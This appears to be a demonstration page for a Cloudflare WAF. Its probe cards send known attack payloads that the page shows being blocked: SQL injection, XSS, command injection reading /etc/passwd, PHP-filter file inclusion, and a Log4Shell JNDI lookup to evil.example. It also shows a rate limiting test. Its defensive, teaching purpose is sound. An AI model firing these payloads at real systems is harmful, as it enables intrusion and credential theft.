Security · WAF
The Cloudflare WAF, tested live
Send real attack payloads — SQLi, XSS, command injection, LFI, Log4Shell — at this zone's managed rulesets and watch them get blocked at the edge. Then fire a request burst to see rate limiting throttle excess traffic with 429 responses.
How the Cloudflare WAF protects this site
Two slides, then live attack probes and a rate limiting burst against real zone configuration.
Managed rules
Every request is inspected at the edge
This zone executes two managed rulesets on all traffic: the Cloudflare Managed Ruleset and the OWASP Core Ruleset at paranoia level 1. Matching requests are blocked with a 403 before they ever reach the origin.
Request
Benign or hostile
Cloudflare WAF
Managed + OWASP PL1
Allowed → origin
200 OK
Blocked
403 block page
Deployed zone-wide — evaluate every request, no origin changes required
Live attack probes
Managed rules vs. real attack payloads
Each card sends one request from your browser through the zone's Cloudflare Managed and OWASP Core rulesets. Compare the benign baseline against six attack classes — every payload below is verified to return a 403 block.
Benign request
An ordinary GET with no hostile content — should pass the WAF untouched.
GET /api/waf-probe?q=cloudflareSQL injection — auth bypass
SQLiClassic tautology: turns a WHERE clause into always-true to bypass authentication or dump rows.
?id=1' OR 1=1--Blocked by: Cloudflare Managed + OWASP PL1
SQL injection — UNION extraction
SQLiAppends a second query with UNION ALL SELECT to exfiltrate schema versions, table names, and data.
?id=-1 UNION ALL SELECT 1,2,3,version()--Blocked by: Cloudflare Managed + OWASP PL1
Cross-site scripting (XSS)
XSSReflects an attacker script back into the page to steal session cookies or impersonate the user.
?q=<script>alert(1)</script>Blocked by: OWASP PL1
Command injection
OS command injectionBreaks out of the intended command context to run an arbitrary shell command on the server.
?cmd=;cat /etc/passwdBlocked by: OWASP PL1
Local file inclusion (LFI)
LFIAbuses PHP stream wrappers to read server files — often a stepping stone to full RCE.
?f=php://filter/convert.base64-encode/resource=/etc/passwdBlocked by: OWASP PL1
Log4Shell (JNDI lookup)
CVE-2021-44228The 2021 Log4j zero-day: triggers a remote JNDI lookup that loads attacker-controlled code.
?q=${jndi:ldap://evil.example/a}Blocked by: Cloudflare Managed
Try your own payload
Any string, sent as the q query parameter. The WAF inspects it exactly like the curated attacks.
Probes are sent from your browser to app.orangemoussa.net and inspected by the zone's managed rulesets at the edge. A 403 means the WAF blocked the request before it reached the origin; 200 means it was allowed through.
Live rate limiting
Throttle a burst at the edge
A rate limiting rule scoped to a single test path counts requests per source IP — 5 per 10 seconds — and blocks excess traffic for 10 seconds. Fire the burst and watch the edge start returning 429.
Live rule on this zone
http.host eq "app.orangemoussa.net" and http.request.uri.path eq "/api/waf-rl-test"The rule is scoped to this test path only — the rest of the site is unaffected. After a burst, wait ~10 seconds for the mitigation timeout to expire.
Fire a burst
Sends 12 rapid requests to /api/waf-rl-test — the first 5 pass, the rule blocks the rest.